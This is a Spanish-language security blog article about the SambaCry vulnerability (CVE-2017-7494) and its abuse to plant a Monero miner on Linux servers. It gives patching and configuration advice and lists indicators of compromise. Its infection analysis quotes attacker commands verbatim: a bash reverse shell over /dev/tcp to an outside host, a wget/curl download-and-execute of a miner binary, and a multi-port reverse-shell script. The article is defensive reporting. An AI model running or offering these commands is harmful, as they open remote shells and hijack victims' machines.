SambaCry Los pingüinos también lloran Hackers desarrollan malware para Linux

Si tiene un servidor Linux  que opera en alguna versión de Samba, este sería un muy buen momento para asegurarse de que está al día en parches.

Una situación que ocurre con frecuencia es dejar para después la actualización del sistema operativo, suele postergarse para un “mejor momento” pero seamos honestos, esto rara vez sucede y resulta es una mala práctica de seguridad y si el ordenador se encuentra bajo el sistema operativo Linux, esto seguramente será de su interés.

La premisa de que no hay un sistema infalible debe estar siempre en el pensamiento de todo usuario de un ordenador conectado a con otros equipos.

Si bien la interconexión ofrece grandes beneficios, cuando una vulnerabilidad es revelada, vale la pena asegurarse de tener  perfectamente cerrada esa puerta para no resultar víctimas de un hacker astuto.

 

ANTECEDENTES

Si bien es cierto que Linux presenta un escenario difícil para el desarrollo de programas maliciosos debido a sus diferentes versiones de núcleo, configuraciones y en general las características de seguridad que son específicas para cada caso, no es imposible.

Ya a mediados del mes de mayo de este año, fue revelada una falla para Samba en versiones posteriores a la 3.5.0 (liberada en marzo del 2010), se trata de la vulnerabilidad CVE-2017-7494 que permite la ejecución de código remoto lo que seguramente despertó el interés de grupos delictivos los cuales de inmediato se pusieron manos a la obra para aprovechar la ocasión.

La falla consiste en la forma en que Samba maneja las bibiotecas que se encuentran compartidas. Desde este punto, un hacker remoto, puede hacer uso de esta oportunidad para cargar una biblioteca compartida en un recurso que se encuentra compartido para posteriormente indicar que sea el servidor quien cargue y ejecute el código malicioso. Una sola línea de código es necesaria para ejecutarlo en el sistema que ha sido infectado.

simple.create_pipe(“/path/to/target.so”)

Era solo una cuestión de tiempo para que la puerta endeble de Linux comenzara a utilizarse y desafortunadamente los ataques no se han hecho esperar demasiado.

Según las estadísticas ofrecidas por rapid7, alrededor del mundo 104,000 endpoints están en este momento ejecutando versiones vulnerables de Samba, lo que se traduce en miles de posiblidades de convertir una terminal en un blanco posible de un ataque remoto para fines delictivos y ya comenzaron a identificarse los primeros casos de infección.

En las versiones 4.6.4, 4.5.10 y 4.4.14 de Samba, esta falla ya se encuentra resuelta y el parche se encuentra disponible.

Incluso, en el caso de las versiones anteriores, puede evitarse la vulnerabilidad  modificando el archivo de configuración de Samba en el smb.config:

nt pipe support = no

Solo es necesario reiniciar posteriormente el SMB de red. De este modo se niega acceso completo a algunas de las máquinas que se encuentran en red y se deshabilitan algunas funciones para sistemas Windows conectados.

 

SAMBA Y LA INSTALACIÓN DE CRYPTOCURRENCY MINER

Recordemos que la vulnerabilidad que caracterizó a WannaCry, fue relacionada con el SMB de red también, pero a diferencia del ransomware que fue instalado en el caso de WannaCry, la vulnerabilidad de Samba se está utilizando para convertir los servidores de Linux en máquinas para formar parte de la red de minareros de bitcoins. La cual cada vez requiere del apoyo de muchos ordenadores dedicados a registrar todas las nuevas transacciones de la cadena de blockchain.

El apoyo en este proceso genera una compensación económica cada 10 minutos que se reparte entre todos los mineros que participaron en la tarea.

En este momento, para poder hacer un negocio rentable con este tipo de actividad, es necesaria una buena cantidad de computadora minando, se dice que existen las denominadas “granjas” de servidores dedicados solo a esta actividad. Visto de esta manera, podemos comprender por qué resultó un negocio interesante el reclutar equipos destinados a la tarea. De modo que todas las computadoras que han resultado infectadas con Adylkuzz (la aplicación que se instala para convertirlas en reclutas) forman parte de la gran red que mantiene a Blockchain operando.

Curiosamente puede analizarse la creciente muestra de infecciones gracias al descubrimiento de los expertos de securelist que luego de analizar el código del malware instalado en una terminal infectada, lograron acceder directamente al balance de la cuenta donde están almacenándose las ganancias en crypto-coins, lo que permite observar que su ataque resultó bastante efectivo a pesar de la acción preventiva que existe para evitarlo.

En el registro de transacciones también puede verse que que día con día son más los infectados que apoyan sin desearlo la labor de minería de los atacantes.

Se desconoce al momento la identidad del grupo de hackers detrás de la ejecución de este plan, pero resulta sorprendente la rapidez con que lograron secuestrar computadoras a penas unas semanas después de que la vulnerabilidad de Linux fuera revelada públicamente.

 

CARACTERÍSTICAS GENERALES

NOMBRE: Adylkuzz

CLASIFICACÍON: Troyano

DISTRIBUCIÓN: El ataque es realizado desde servidores virtuales de tipo privado que exploran masivamente por el puerto 445 en busca de objetivos. Aprovechando la vulnerabilidad de CVE-2017-7494.

 

ANÁLISIS DE INFECCIÓN

A continuación se describen dos tipos de análisis realizados por SecureList y Cyphort.

Como primer momento, los atacantes verifican que tienen permiso para escribir en la unidad compartida, esto lo realizan intentando escribir un archivo de texto, en el caso de que el intento sea exitoso se genera un archivo con un nombre compuesto por ocho símbolos aleatorios que posteriormente se elimina.

Luego de haber verificado tener permisos de escritura entonces descarga el payload que se encuentra diseñado como un plugin de Samba. Y posteriormente se ejecuta con privilegios de super usuario. Para esto primero es necesario que los atacantes localicen el directorio del archivo descargado para lo que realizan múltiples intentos adivinando las rutas posibles.

Una vez localizada la ruta del archivo, se carga y ejecuta  utilizando la vulnerabilidad SambaCry. Posterior a esto, se elimina el archivo para no dejar rastros. Pero sigue existiendo y se ejecuta en memoria virtual.

En el caso de SecureList, se decargaron y ejecutaron dos archivos:

 INAebsGB.so (349d84b3b176bbc9834230351ef3bc2a – Un shell inverso que ofrece acceso remoto a los atacantes)cblRWuoCc.so (2009af3fed2a4704c224694dfc4b31dc – Un troyano que incluye el software minero).

En un análisis realizado por Cyphort realizado desde la IP 45.76.158.18 que parece pertenecer a un proveedor de la nube se puede observar lo siguiente:

1: Se identifican los recursos compartidos de red. Mediante el método NetShareEnumAll, el atacante logró listar las acciones.

2: Mediante NetShareGetInfo, los atacantes lograron identificar una ruta de acceso para recursos compartidos.

3: El malware es cargado en el recurso que se encuentra compartido. En el caso analizado, el nombre del archivo quedó con una extensión .so (GJZjrflB.so).

4: Se ejecuta el código remoto disparando el exploit. Haciendo una solicitud de “NT Create AndX” usando la ruta local a la biblioteca comprometida cargada y seguida de la solicitud resultando lo siguiente:

 “\\ PIPE \ / tmp/smb/FWUNy14ZME/GJZjrflB.so”.

Los expertos notaron que también se ejecutó un comando de Shell

bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

Esto consigue descargar un binario y lo deja en la carpeta tmp utilizando wget o crul para posteriormente ejecutarlo. Esta es la aplicación minera bitcoin.

Posteriormente se ejecuta el siguiente script:

#!/usr/bin/env bash host=’149.255.35.33′; nohup bash -i < /dev/tcp/${host}/4001 & nohuo bash -i < /dev/tcp/${host}/4002 & nohuo bash -i < /dev/tcp/${host}/4003 &

Lo cual resultó al parecer ser un error de escritura en la sentencia.

PERSISTENCIA

También fue localizada la ejecución de otros scripts, probablemente para reiniciar el minero de bitcoins en caso de que quedara fuera de función.

#!/usr/bin/env bash# process guard script

 

INDICADORES DE COMPROMISO

Traffic pcap:

c208fdfe2ce715bbd8dbedf83bd940f0e6fa4064d1880bfdd5ad956aa2e2531c

Librería del Exploit: 13a0ce618dcd0e17c7d8267174d07a997d39fcea10f8951ea7c0b5218ddcfe85

Mineros de Bitcoins: 1af2b594fe2b050fab44bc4f1d951a228192b22a6e4ba98a553dba78231d15e9

c8b3f03b0275b5bcee34a685187cd6b648346d9ca7f1b0cbb255c45856f7a49d

Exploit library: 06778ca06eb0be4a734a2908f3746764c148817707dbc32fad5f8dac6cc81e46

IP        

104.238.150.145

104.238.185.251

45.32.52.8

45.76.123.172

45.76.39.29

45.77.21.159

45.77.23.225

45.77.29.51

45.77.3.179

45.77.31.219

45.77.5.176

45.77.52.127

45.77.56.114

45.77.56.87

45.77.57.190

45.77.57.194

45.77.57.36

45.77.58.10

45.77.58.134

45.77.58.147

45.77.58.40

45.77.58.70

45.77.59.27

SHA256

d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988

e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71

e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee

fab31a2d44e38e733e1002286e5df164509afe18149a8a2f527ec6dc5e71cb00

a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9

8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233

450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f

55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88

6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3

29d6f9f06fa780b7a56cae0aa888961b8bdc559500421f3bb3b97f3dd94797c2

HOSTNAMES

aa1.super5566.com

am.super1024.com

d.disgogoweb.com

lll.super1024.com

panel.minecoins18.com

a1.super5566.com

05.microsoftcloudserver.com

07.super5566.com

08.super5566.com

CONCLUSIÓN

Según el análisis de las transacciones en la cuenta de los autores del ataque, ellos comenzaron a recibir bitcoins desde el siguiente día en que registraron el dominio el 29 de abril del 2017.

Se estima que durante el primer día, lograron ganancias por solo 1 XMR, pero durante la última semana las ganancias se han incrementado a 5 XMR por día. Lo que nos da una idea del crecimiento en la red de ordenadores que ahora trabajan para los perpetradores del ataque.

 Aproximadamente a un mes de haber comenzado con la minería desde las terminales infectadas,
ya han logrado sumar a su cartera alrededor de 98 XMR y se espera que esta suma continúe incrementando.

Lo más preocupante respecto a la gran red de ordenadores que se encuentran ya infectados con Adylkuzz es que al encontrarse bajo las órdenes de los criminales, podrían utilizarse para otros fines con características globales.

Por otro lado, resulta evidente que cuando una noticia es revelada, la prioridad debe centrarse en asegurarse de no formar parte del blanco que será atacado.

No perdamos de vista que uno de los pensamientos peligrosos cuando operamos equipos es creer que estamos del todo seguros.

 

Referencias

Sambacry is coming

Linux samba vulnerability

 

Share with your friends










Submit
Tags: